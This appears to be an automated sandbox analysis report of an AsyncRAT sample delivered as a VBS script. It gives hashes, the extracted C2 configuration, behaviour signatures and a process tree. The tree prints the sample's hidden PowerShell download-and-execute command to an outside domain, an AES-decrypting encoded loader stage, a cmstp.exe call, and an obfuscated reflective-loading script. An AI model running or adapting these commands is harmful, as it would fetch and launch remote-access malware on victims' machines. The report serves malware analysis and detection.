Analysis

  • max time kernel
    97s
  • max time network
    99s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 22:52

General

  • Target

    7166_output.vbs

  • Size

    60KB

  • MD5

    dcaadf5b6a871821a09e8be7f12603b0

  • SHA1

    49c943609633112b80fe7b50c79ca6eb072eb3be

  • SHA256

    407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549

  • SHA512

    e18a9bda8f0efeb8bc490b320f86b14a7bc3fb667af4c193b9159d780aabe11da48bec08a6d605f2f08c65d661b5f8e572bf52e5fd712735196d46ea68a15db8

  • SSDEEP

    1536:akm3NbS839HXCQHXFNx7X+xW7lflsAmPUoLlXBCbB:aLl3pCQ35+EDu3y

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:2024

127.0.0.1:15509

127.0.0.1:11979

2.tcp.eu.ngrok.io:6606

2.tcp.eu.ngrok.io:7707

2.tcp.eu.ngrok.io:8808

2.tcp.eu.ngrok.io:2024

2.tcp.eu.ngrok.io:15509

2.tcp.eu.ngrok.io:11979

5.tcp.eu.ngrok.io:6606

5.tcp.eu.ngrok.io:7707

5.tcp.eu.ngrok.io:8808

5.tcp.eu.ngrok.io:2024

5.tcp.eu.ngrok.io:15509

5.tcp.eu.ngrok.io:11979

Mutex

rBBszd57Gkh8

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7166_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand  
         $ R O q F w g o A   =   2 5 1 0  
         $ S j X Q U x b X   =   ( [ M a t h ] : : S q r t ( $ Y H Y U r f O z )   *   4 4 ) . T o S t r i n g ( )  
         $ J S U S m M U Y   =   " 2 "  
         $ U b e E c Y O f   =   " S "  
         $ U d O w K f I x   =   " 6 "  
         $ z D e b n y A F   =   " V "  
         $ s O q V N X V f   =   " G "  
         $ r o O Z q I a w   =   " K "  
         $ f A e y E j h C   =   " 7 "  
         $ P Q Y s P l A g   =   " r "  
         $ O P I a F d Z G   =   " q "  
         $ m u g w H w i N   =   " l "  
         $ g R H q G y X E   =   " l "  
         $ f B n l M B Z F   =   " F "  
         $ E N e X f O N N   =   " K "  
         $ f S N F r Z B G   =   " J "  
         $ n x J F I b R D   =   " b "  
         $ O F U F Z a b Z   =   " k "  
         $ t 1   =   8 0   +   8 8  
         $ t 2   =   ( $ t 1   *   4 )   -   ( $ t 1   /   9 )  
         $ t 3   =   " 2 "   +   " S "   +   " 6 "   +   " V "   +   " G "  
         $ t 4   =   " K "   +   " 7 "   +   " r "   +   " q "   +   " l "  
         $ t 5   =   " l "   +   " F "   +   " K "   +   " J "   +   " b "   +   " k "  
         $ p   =   $ t 3   +   $ t 4   +   $ t 5  
         $ a   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ p )  
         $ d   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( " t D b / 1 X a 0 U M u N e 3 K s Z k w A b o E h m 4 R D y Y x t + q j e E E t 7 z t 4 0 I O T w k x u f o r g M o v E P w 5 d 5 v i Z B w b s d / Y f P O 2 Y y D c C i d T A t l b W s Q x e V v O C q N D O x T x g r C + 9 F B b J G + d r K G L R d X i W h J r p W c w Z A J c 7 D 1 O X R M 3 s I H P p E E O Q g v J A j Y u Q M Z B W G N 7 x Y L W W w Q h q r 7 H c t E F n E w 5 8 n e R l e S 2 K Q / 1 9 5 o K B n L k b C t l p z 1 2 M R 5 b 6 R M Y Z r o + f 9 B E + W q 7 z G H P y 9 / C R N l 9 U S Q d 2 6 f r M Z 6 + T k R i a 5 H m g t n 9 m R S w M X J i 1 / n v b Z 0 X j s W r C + 1 H h b O v 8 D 0 5 l 6 y 8 5 X e + O 9 c 8 6 f X v W 2 3 7 C i 8 7 V G P i + G j 1 O 9 d p 9 H 1 6 0 F P G 8 0 O 7 3 l W Q K h X 6 C v Q V b p j i A M I c Y W 7 Y i b r p 1 V B h S K 2 B k D v y G + Z T 6 V b k h R 2 w d 8 Z j x B Z J C M V K 5 I 0 d b u v 7 U j R U O U 3 A 6 j 8 6 4 W L 5 + S I B z o + h G w B + V 0 b v P p j J L V T 3 O v F W V D 2 f W 0 l 4 P A F Y N W n y I d o h W k U 8 V W I 9 2 + X c S L x Y t 1 U m i 2 L n 4 c 6 G g J f E A Q 7 W 7 x b A X R q 3 e F q d k N N 4 e o G T X 8 O R H d B Y I 7 W e 2 g g E Z r I E Z V y 0 9 k 6 k 4 9 x t i C e e H x W 6 j A m 4 I v y a f 2 N M C n m S D h + i p d 6 U 6 A 8 R 8 S p M w 4 y 7 e l E H + 6 g A e f 7 Z n 3 D I q m y S q o P x N h s d 3 V s x D Z o h I + e M 5 5 k X e 4 d q f T 6 K L + I J h d v 2 j Z Z w z T S G f c m b s w 0 G g 2 b x G g G c u y v p t S O q t Q H 1 z S s i D 7 W T e U f X P 1 Y c T M 3 5 s b z W Z y t x L o w h s R E d f 5 Y X 9 W W a m V 9 1 a 9 m a Q J f s / O 9 8 r S y 2 h i n w G P 7 z F 3 d p T R S 3 + R n C + u j E d x 0 7 6 A n 9 t Q J D R r O i F y 5 k P m 4 8 T T + r Y 7 j i f W W q r f N 5 V 0 + I z u n q K 5 r 4 Y F L 4 p P J i Y Y 1 7 6 X Y G g L 1 C w J G L p w x c Z G s / C T x S / y q 0 2 n m Z D c o i g e 2 4 x J g G S X a t J e u + f N p D B E 4 e 3 j v u q U 3 G h 4 V 3 b M K 4 J 9 Q W x 6 0 d l P 2 X M z c 8 e K Q Q b / B j U e T M / w q O j o K c n Y y x 5 R z c 8 R J K B t o + M T c C G A z 8 x L 9 B 7 3 0 j T N T u I 5 L 4 9 H q p Z W W b W B t 3 m O + W 6 m R o P r d x t e n y Q l J 2 I M 1 r I C j c s / i V p 2 Z n 5 B Q C e B Y S E X B F E L + G e R l B Z p 2 J 6 h 0 e D a K j 2 9 w Q U l K U x K P 3 c n E F B Z i O 1 r D 0 h / p T 3 5 H w R j 7 w L P 8 z I 8 l c A M p h j 0 J k A 7 O z j z 1 T F A 7 T Q p Y v v c E C g J e l F D 6 F z D N 9 w f Z c A R A p s s z N i L B u L k J 7 p l n m 9 Y s C n R e Y b 1 d S R o D q r c I / l q Z k / L 5 5 h Y 8 m F e 0 / 4 Z E x G n a 1 Q y n W M k z Y u m m t a w q / f 9 z m C w 2 Q s u H 8 S F a x 8 n 9 p P W n i T 9 w I c Q t K d i S Y a W e h r n b Y F 8 n Z b I f K C j Y 4 B V E c J 8 t 4 E e R d m p O g 7 8 o 4 g t B + c K A F a E H 1 W h e R o U P O N 3 B U M / 4 3 s a 5 V n v b B F B M K I V N p e 9 E Y U r M r J r O L 6 A P W I F k 6 C K s 0 R y L b w O W D Y B z X 6 R 2 / P H + D C Q A n I C E v W x w S 9 p J 3 Q y V f V F e v T e 7 W 8 c c y P n 6 T N U 7 B g n f D O T H R v 5 u s 3 m q t t y 8 0 u q + Y v J q o X f a q l o X K a g H j Y + K z 6 j 5 q J A A N + 4 2 V B x l u i N a g m g n L o y 4 Q k A 8 F b C G x D M r W 3 2 h y N n S d h 6 9 p U 1 K C j U C 0 p q k / a V w j H m R J 3 c 9 E c e k t v I h G K f 2 q S P O y r B S W M U n 5 E O 7 E u + o R t 2 U 9 8 v F m r 5 a U l E 3 + H C L j H L q l s K / n 3 O 8 i s z f P z h r 7 l g P i F i 1 e h n 2 C r Z j 3 l n H R G D e g 9 1 a s a l b 1 M C u 3 f f I 6 X M m + 4 R 7 u B 4 F T i 7 8 8 g F h c 7 V K N n v h / 5 0 k w + 9 N b c 1 y e M + f / I w M y V U c X y m y 2 5 q 8 d R u c k e X h X 8 e y 5 J / y p k a V s r p N K 5 Z B T w u f n 9 9 q w X b z g / n y X p C a A o 6 W c 4 m Q R d S U 9 p r j q r G f j O C m v y 5 U b o C 8 0 h V a j Y c R R 1 V r P 1 M o j R 2 t 8 H I J x W L X L 1 0 F D w N B B p P w Q N X l N O R I x f F b d v y c W s P X q G d R v D z T S 5 Q m i y x H u g e k x 5 T Y p 3 p P S i I u 7 O v K W W n Z i e p N I h 6 g 0 u E w w N s h u n S L i e e 2 U o K X 7 N s I a f E E v e a 6 2 A H h P H 9 i 6 Z V H P 1 h J a P b C W h N 9 3 0 1 v M O l p K 3 n C C s S / 5 x d J n D e Z z 2 9 J w U f W 7 y A g F W u i 9 3 R v N 7 C C t A B b t E T P h 8 O X E P 6 V 4 Y d K 3 M z a t z n U A S C / P H z w Y x n 7 n H U + Q L q / f I o D H e j f V U o O 3 C g s X 6 h 8 Z n h J 0 B E c y + H s e Z M 1 Y 2 f 6 f x p p 2 t E 9 m e I j Q w q y c F y C K h T K m h c Y 8 b 8 E 6 i 6 p 7 N m R 5 J a 3 X 4 I K L 9 Q 3 i t u y m v b h K 0 b h v b r 9 b B d C M h c K E 1 A H o A C w c n H E b h q v o E o u N n m j d y 2 C t I 2 X B F m T n E a Z o b 2 j N j V + M S 7 I b b w V R w I W r a u D M U U R z 9 D o 8 0 6 e w + z 5 t V x 3 n c s M R G D K Y R L V N 2 e 7 Y c O 9 7 J f a D B a a v / r E 8 p x 2 p h 3 u J a N d S R 4 E y 8 P y g j 1 G x 0 Z L 1 R + 6 f V W h g v D k i j R k X 9 n L 1 Y K U z i K o h I 1 P u p o 2 9 + u o Z 3 v 1 X Q 4 T G a q D 5 4 q 9 h S q u Z D C S J 4 0 h i H D U L R D w d 8 D e j 3 1 j P q 6 / z s 1 e A B h 4 i Q H j o M t A H f W z h A u L y Z 5 N N R G d 6 t a Q 6 U h J S i l F v u 5 k Y q k n w w c S 7 f c b V n V m e 4 J Y 5 5 V d + p 2 d / a f R f p M A k N 5 6 G 2 Z A F q I 8 D m G T E d s C P X p p U h k 8 a 6 P V l 1 G U S u b Z b e B O O 8 M h Q Q T f g K m H h Y T W A t N C l 3 4 D x s Q s L q R d x t v 7 C V Z c B Z P b l e I x A y s 3 C 7 E 6 d o p d q t Q d W L U B n u S 8 B h h B Q A 8 A 0 7 k c p 7 k z G D x C b D x Q q y H 4 w 6 S F E 3 o v L 5 O F R L S s K F O 4 H 9 z b k C V S T i U H 8 a T t 1 1 3 F j r 5 L p V E I 2 o Z O 5 i t P p r 8 C 6 X A C 8 P m J i G + E i N c 1 J M P P h M T q n u j c O u Q i k q s r S z 2 h u l h q B g v d u X D f / 1 D Z j D G 3 G g O J d w 9 6 8 Y c 4 3 n Y / y N f h l 9 m o t r t j b d A n r q g u D j H Z F x W S F W t W x V O N S r r M p 5 u g 1 R 8 W y p 6 F W I 7 v 4 5 8 l N L g 8 t m J q S 4 o + E w e q A M + o f f z k P Q / / s S r D 3 z H u R f v 1 L I B w n C N V Q 2 R d I D 0 p 5 V S + a U J 2 e p U v Y r B m K l m v b 5 C V G i 9 E L 4 n V E o G 9 W G x e C n t X C F U k F f i b Y N a R i u 8 s o W H K q O Q b v W D m L N f K 5 F m a l T H r C A T e / E 3 9 L D / L 5 4 H J P P a d z 9 k P G z u H J 9 Y e s 4 g k m 6 i M g w O A A F p 4 L E 5 1 v 4 u C Z 9 L F X 5 G M X J a g C 9 G r A i U C 3 f s y W h D P U K 8 7 Z 1 p 0 0 T x X R E G / 4 Y b R C c 5 z K P I 0 a B V V y B c a 4 8 3 Z N Z W b n H v r b M u P B J C h p U S r c G N G r 8 t A g p f M 6 3 D 7 w F L W M M 3 0 V N m N x 2 P w E r y / Z M N n U Y n R J 3 B v Q d r A U z B + E y q e P z E l M x U h c T r t y M 4 N 8 U T i c H P 0 v K 2 / d o E p 9 r o K F T n G 2 J p L H z H n l + G / 7 g d W 5 W J t h t I D M n I 4 R E 7 b j y / e T 0 n E w x i C O k Y V p Z L q X J y W 0 W A s u g y c L v W K A Y 7 5 u E K 6 n B H M N 5 o A c 3 b X G s E Z D F A E H / G i O s 5 a c g C Z o O Y M e q I G R N L z s 0 z q H T p c J z s d M E P b 9 e x x v v P F n X D G g 3 G L e i W U d p I 6 a + P l 4 s 5 k n F q P E i 6 b 9 3 F r M W I t D B O p N v 6 A y h i x A m q T b d + 1 n j / G l 9 c E a B H I P H W S Y L I X E F v V c S 5 Z s x l m U z c Y G O R z B 6 T k 2 F X M v N j v 7 P 2 E x K 8 3 W e 1 P Z 2 k P v V f Y + 6 z f a D b r 9 K v V n t G 9 X G F v P 9 V M 3 f 5 Z e Z F M k F w t c 6 n U M T h H a P J q f E k 9 u u p + f H S C 2 8 e G k 5 4 K D m U Q q V q D G 1 I + 6 l T k C e c G M K u V 1 J e R R 1 w g G Y R j F o z R o e y r X j q c + 3 T N V C g u / 2 O 3 m 9 l 8 r F 2 o e R d I V 9 H u 6 D y 0 z c p B e C n 3 j R h D z 4 W m R 9 5 M D F 9 D y a v L f v 9 G a C A 8 H R k K H x F r r u o B q H p U v L e F 9 N 6 b g T I 8 t L T Y b 7 h O o 2 a x F P 3 P S N p W U x / I K I x j q j h v e 0 h x U I e y / 5 V 4 / E A L q y x I G e + 0 2 7 / H 1 m 9 i W 7 h 9 S H 2 + o s b w O v y a G S q P I I B 3 1 5 H U n 3 k M B P g I H h 9 G 3 F O / X J O g I e X X 9 S t g o H b k h 6 F T Z c y S W 4 Y w L 7 W c I U z h P 3 N w o E W U G r + t f j p R + N B f F V 6 D 2 2 U g B 5 0 2 S B o 9 c M L Q / q / E M S R h f c N 7 B q K y m k Y e S P Q R r t 4 T 1 W s 3 u o O n t w b 0 6 c s 8 3 P Y 4 7 P 0 x K P t e N c 2 w 4 Z x c l 8 o d H V 4 1 8 j W O w b z c w S N B x K R S P Z 5 I U c V R M b 0 L g W Q R J g 7 u d 7 b k S 9 7 K T W P O / Y 7 B o K U q P 6 U L q R e B 4 X + 5 / 9 u f h I r y a g y z 6 J D x C n P 1 Y F k u N j R o 0 v z U W h z p r u w v W 4 2 2 j L u o 8 B U O s k Q B y E u m o j Z V 2 2 V C r p h m v Z H e v 1 E 6 2 z Z + u C V H s T O E O T W 7 B x e 1 N / N E Q K G N l e E r p 9 u + J Z p w u 7 0 J Q 2 r J 4 P v K I h H T m 1 O x J N y 3 6 G E q j y e E J 9 Y u S 8 0 t o w C U M Z c c A e h 1 Z T i 7 u k p j e L s W 5 4 o F l 3 4 H 2 K D M D F 0 t N m g R N l b x B H U 0 6 4 8 m 6 X t 7 t 8 v 6 z h y E R 9 I R j Y n p r u S 7 E r s / I b f 2 e g j G 0 Z + m b U Y c I 6 y x e o Q 7 G P w V M B 2 0 / Q 4 N l f k j C D X g L p 0 D K l 2 O + m f f s f L C G R m x L 0 i g d F A a X e Z n B S G x q U K / D V R w 7 p 0 e h 4 g F C R 8 p O y i R y P 3 S M B j N f Y m d v A S U i 1 0 z 1 Z v 4 4 N j L m 3 d M d f 5 5 A u a 2 a 1 O Z c H b 9 G o P b f f W z 3 J u 5 g E T H n T q L o o T T l L A 4 X d u h W I U y l Z i G B j S t p R v O 3 b / N L r G 6 + 6 M H W u A T u J d G T j 3 / f 0 u D 1 c U k a t l s L q a n k J y d u 2 U Z E F M W 1 u G Q u E N E K X x O F / e A s / F c V T V D E W 9 a v S y 2 s p n x U X 7 I 8 a V x F j u j f F Y k n v c W M X S 4 I C W n j j t n m h j l 8 d f j p v 6 q K Y 3 L / L o B T 5 e f z i g d + i t Z i e l u r d D r y R g e L d j 3 w z N z V 7 C c g h F 3 1 p h D H W b 4 F D V X W j o f U L d D t M z p / Y h K h W P q v A 9 E z f g c m n U e j 7 / + 8 q 6 8 9 i u I f X y L 0 s 2 K 9 m v W Q V j E C i M z / O + F X / j o F D f l t y v l 0 i I z m g 1 U 9 O J s u S y j u j s c 6 e X K 9 i T h H s J 3 k N Y 3 V Q C L K 6 A 5 O i M 8 E b C o j Z y c X G R P M s g T 4 z C r k G + p n V O 6 0 k c E j C 7 r V z S d N R b + a J 7 p 1 A g + P Z Z g 6 X + 1 T m 3 A b X z e E f i L 4 B q n c Y F B g p A L V l s 4 B H v v n k Q A E h 6 t k O w F c g F H B K J 0 S u w Q d B 2 n D 0 W n I + I j I 3 A S v h y O k o + c B 1 k H 0 e t 4 f J d d K 6 1 z a p v G n X A g z l C D T l k F s Z Y I J Z l 2 M u k I S B + p Y f x W w t / V D Y K r M W S / L K m p w D e 0 + M O 1 1 M W / Y N g O y F F T L P r w x N B 3 i F b O a 0 j o 9 n p v v 7 O L Y S W I r 1 n i H y 0 F C 3 y j p h b r 8 j r a K d B x g o E D 2 O s Z S D G s k c f y H N P O O 5 c 1 7 d 0 g 8 F F X Y s Q 5 d Z h M A 9 4 K W 8 8 C C Y g A 9 I J e n O 3 L H N X K D K b 3 e L R u g C 0 L 4 x y 9 L F J T 2 / X w S p 5 M 9 e e m 7 q F 7 o R c m K c k j C I B o h w A l s v u M W 7 P K 2 T y 0 B P U 3 o H m i t o l 3 6 1 b Q F b Y k N G C R F 4 q S u T a + q 1 1 f c x 0 d H A P 4 e R J y U k 5 s a g P j O T q q v n P A o k q 2 Z U O m + v 5 e x j l u g m R P 8 x D W 9 r I 2 V k + Y 6 R A + T T W n F S K G n g g B E Z u y b f A B n Z G B 8 H r U a q u Y / n B D G 2 c Y r / R / D u Z A i n T t M D E m / N C 3 O 9 D / j R P p O r 4 / 0 r t F o n 6 q U K Y W h w x L / Z 7 e 9 k r b p U b y O t Q i i P X 3 b f t U d z 3 s W B O c Z I h Q 5 k j W g k 0 8 u M R a P Q 5 h h M 6 g q 3 M n Q G c W M T Y S X j C g o d 2 V r D D F C e c I n B v t d W s q R E U + Y 1 0 x L 8 r i j j T A i y O y j 8 A w 4 f I q + j e J k 1 0 v f x o 2 m j 8 Z 3 b T I v y L 0 L 2 Q 0 W z Z X k 9 i w G f L T r K 0 J H F P v D s L 6 b E r N k 5 8 8 o t 5 E 2 H t O r a 6 0 B W 7 3 9 3 / Z k v p B r k 4 q 0 u X b 7 U 2 1 1 H E X L N O X 3 e l o r k 9 X E n A X V J S 6 k j l W 2 n 7 6 W m C K x + d V L F Q U N R v X + M G K S p 3 7 G B q 4 4 N i r L 2 H o i q O + F l U u h w z 1 3 F j L 6 p w k V c i 8 s B P V b J 7 X t L 8 e D c N f g F F w N n 2 r N p C 6 V H l p M h v O c f t I X F M p w D 9 J n Q 2 n m f 4 + 0 a c + K 0 M / N L 0 N p k U / Q / u Z Q 5 l Q N d s + h U t B L I W b / g W 9 b g e P J F j a p S Z e r L y D 7 G x 7 C I d C D G k M f S h h P r n 1 i l O x J S D 6 W O x Z J 6 y g O d 8 Q 9 U m X n b R 2 + G / C d W x V G W a 1 j c t N I X 8 O Q N s o P n u R t U 3 i H K 5 e 6 P T X / u p + x X v F p 3 I U 4 d B n Q r U g i 9 i k n e J a 7 a o p P F 6 X x W B 0 G F L p X d H a 7 a b O W 4 b s w 8 P X x y k o z E M m n t R N y s H b n j Z p p 1 F r V y b Z h g P c t 5 d i b 4 A h 4 j n n D 0 h o b k i 6 7 j 3 S k G Y D 9 d M J L 7 8 R j / M e a 0 t e H A 4 r s 3 Z 3 s / u + N K K r V 7 A A c x 5 X H D U Z S / Q y 6 K V r r l f L r p y a M 1 B M Q o 2 D 5 H I H s 4 3 6 e 6 Q a i 1 4 5 W J A 8 x L l W k E L G / 4 F t H Y J W r d Y v 6 7 I 4 4 L 9 d S 8 s 6 x r G X 6 M N v S q N 6 O F H Q B w P 4 k j 2 S e i R b Y i P h 9 g R b z i z V q Y Z c J q 3 V h z F h y y 6 6 Q n C B Q o f M A Q C j R M N c b v 6 d T P D J v j k p 1 g U 8 6 G l V U 5 T u 6 N N l 8 z G w T b i e H M I / R W e Z M h k i m n F N o o B B P 6 a y B K y v g C M d d M R I S w i G A U F y O 8 e A C p X i C 4 d Z E 3 d X 7 P a S q d u 3 3 U + H 4 8 K K E l Y N J A 1 8 e E h E 6 e h c x J y K 4 l J 9 3 R A b f O g V I w j X M v J v g e b b z 0 W P F k v y 7 v o 8 w l R s U W 4 1 V O q 6 s h G t P 2 R O l g 7 3 R 9 N D V 9 W t m + n P g o b r z j 2 G I O G k e T a f R l U F a + 3 o 5 A 8 K 1 L + a n 0 r A K A M j G l H j E s F s D J k F D s 7 a A D l C X l K 2 I Z O H K a d o B 3 o S D 6 B R l Y f q 3 L R / 4 a 8 C 4 a D U Y N 0 S l v q e d w k z m 1 C 4 z l o Z I j R 6 t g I S V y Y m + t y E C Q I M X e b H R G a V N x K / x 7 5 k D 9 S o H u S / V H K C J Y b d F 1 5 z e l I x d U z b o r m 8 5 3 R 0 Q A L d b 7 6 / r 1 o E x y J E B h W 8 2 D p O i 9 q / c q d n / d u D n j T 6 C s W 7 u X R b W H Z o x D s a 4 o A C H K s k W h 2 f a u R H g M U l R 5 W s / / s 2 Q R B i 7 K v w a E F R L 5 Q n s K T d D a q 7 v f v T R 0 J M 7 2 5 t v e W P A D D h I A V 5 + A z r y D l 5 W z L N y x c F N r A L 8 t A H Z R 7 S + x s z j I M Q a S t J 2 v O L 8 0 X 0 5 i 8 n N W X r / Q u 4 u 3 7 z L Q n a 9 L B e O 0 H J m g I x v k H 6 6 R X 5 B L L e q 3 Y E a Y p X U + V B 2 W K J O E P M 9 b U Z 3 O v 1 d f C a l 7 d m 0 J w P c V X 3 b G E N W r V S r U Q O R A y 0 X d 2 W H H / e H Z 1 r M G f Y Q a + y c w T 5 2 R 2 g U 7 6 p M 4 n U 0 7 K F c 6 h N x 0 V b L 8 F 1 M V l x l D a O i / e e L Y 3 8 S 8 d + k u 2 J Y C / 9 M M M o U K p M 1 I F C h M s P r 9 I b P V D M K 5 B A 0 / H v 7 d G p 8 P l q B X 9 o R j M p O X D F D K 9 + o y i 7 N 1 W e J X M Y Z w R c F x m S Z F h u E o F y x K q I 3 h f + 8 d Y 0 K Z A q C q / j J Y C W M S j G Z Q I h J r 9 r a D E i L t l r T h W 0 o a 2 q A m / s x q l s o C i j e A 2 x S N k d j D t O D 9 2 4 n M B N 4 M P U W 0 J V / y k a z s F m t e j A A 3 Z l B k O 4 t N p J D k h p 0 0 u E D 1 C / V s g a 9 q j K P U d N l y y j A B N X P W t 2 O R g 5 Z M T T M 6 M S m 2 O V b N / Z y T N a o c F Z X C Q h 5 y Z z q n x K O v u e g M f l Z t Z 0 n C V N L Q a h q k C 7 S p k 7 Z v o i m K H d T t y v P l d X + U K 2 1 q 8 b l I b 6 O e b o J 1 k P 1 h E M Z D 5 9 b e s H 3 y b T E i n 9 q 6 1 O V 4 1 / x d M 9 Q k d a 2 f n e B c B D 5 A 1 s V h v M K t Y N n h G j q u o n F Q q x p R q R g 2 a H X M R y w o 3 1 M s l Z Z R H A v 0 D r c w d D r f 8 C 6 X D H 1 P w Z U S G 7 I 2 S r q A k S E O J O e I T e 4 X J 9 p g Q q C t x C 2 d e D j u I Z 9 1 Q d m d h 3 + V J 3 y + U 2 u I 8 K O 8 0 X K 2 Q X x k m H H o F u k 4 3 o t S H G J X C 5 Z g Z v r 9 y c + b E j V O w W G J G R C b i o E l 3 w z 8 b S 8 B L k v G i 5 g G f m L 9 l w z R I L W Y O m 5 u G W t 6 I z + g w 1 + R P e 6 I m x U d w g B g T h K d N 2 Y F L R a k r P 7 t D c 5 5 S l E y d V 0 o Z A P X 1 t m p v y B 6 4 w O n 7 0 J E 4 b I A n 3 N n X g U W B Z R K c 6 l r p x Y L 2 7 y i o F / O f 1 H H P t y r V B 4 / r f u / R 3 R 2 r f D / T M o + F w X h X S G j y L n 7 + q W t Z g C I x Q H Y o b e R C r C A U g x q f I e z O H I 8 a x J s R m t J + f 2 2 q 1 O b j o V l C o O 7 H f K M v p i 0 Z C o s d 5 m X + u h l F f C J S / d V y N 8 k K + F 1 p 2 s G p B 3 Z k B b t l X 7 n y I g B Z X 6 D F r f L Q 8 S 5 8 M g Z k Z S 4 b 0 1 8 E 4 g 9 C y r C U o b 3 a u B L o A y v 4 t D Y O k 8 g k K z U f 4 t u m E q r p Y x 4 l O b u z u 2 D A 8 A o / p C W + 6 Q Z a h b n S C b 4 a 0 W U n b I M U e J d J I x 5 W 8 t + M T t H u u H i R k 8 b o C A O m 5 v W k N u l x q / / d T f R P g F E U P x 5 F h z J M s u c b a L 5 + T t d l N q X d + W 2 l d P 1 5 o + 8 e 4 9 O u 0 K 9 m G Z t W a 7 H 0 q x D l 2 d C d O 8 E A S M H K D A U g 7 9 G M m 3 + c W + v N Q z B C w 4 0 4 Z P 6 y 7 6 c G l 4 k N r G y i k P 7 a " )  
         $ i   =   $ d [ 0 . . 1 5 ]  
         $ e   =   $ d [ 1 6 . . ( $ d . L e n g t h   -   1 ) ]  
         $ a e s   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . C r y p t o g r a p h y . A e s M a n a g e d  
         $ a e s . M o d e   =   [ S y s t e m . S e c u r i t y . C r y p t o g r a p h y . C i p h e r M o d e ] : : C B C  
         $ a e s . K e y   =   $ a  
         $ a e s . I V   =   $ i  
         $ d e c   =   $ a e s . C r e a t e D e c r y p t o r ( )  
         $ o u t   =   $ d e c . T r a n s f o r m F i n a l B l o c k ( $ e ,   0 ,   $ e . L e n g t h )  
         $ r e s   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ o u t )  
         I n v o k e - E x p r e s s i o n   $ r e s  
  -inputFormat xml -outputFormat text
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3064
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4044
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES356.tmp" "c:\Users\Admin\AppData\Local\Temp\mtxs4qav\CSC14955CEFC1A24FF985C145702B55CC.TMP"
            5⤵
              PID:4104
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\oqwqvgfx.inf
            4⤵
              PID:3520
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2548
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DK2yqtn/8WWLFGdN0SGSXoqb0xwC458hY3mEb0Z8Op4='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Tn8+JuQ0zcIx9j+6ZeLoqQ=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; 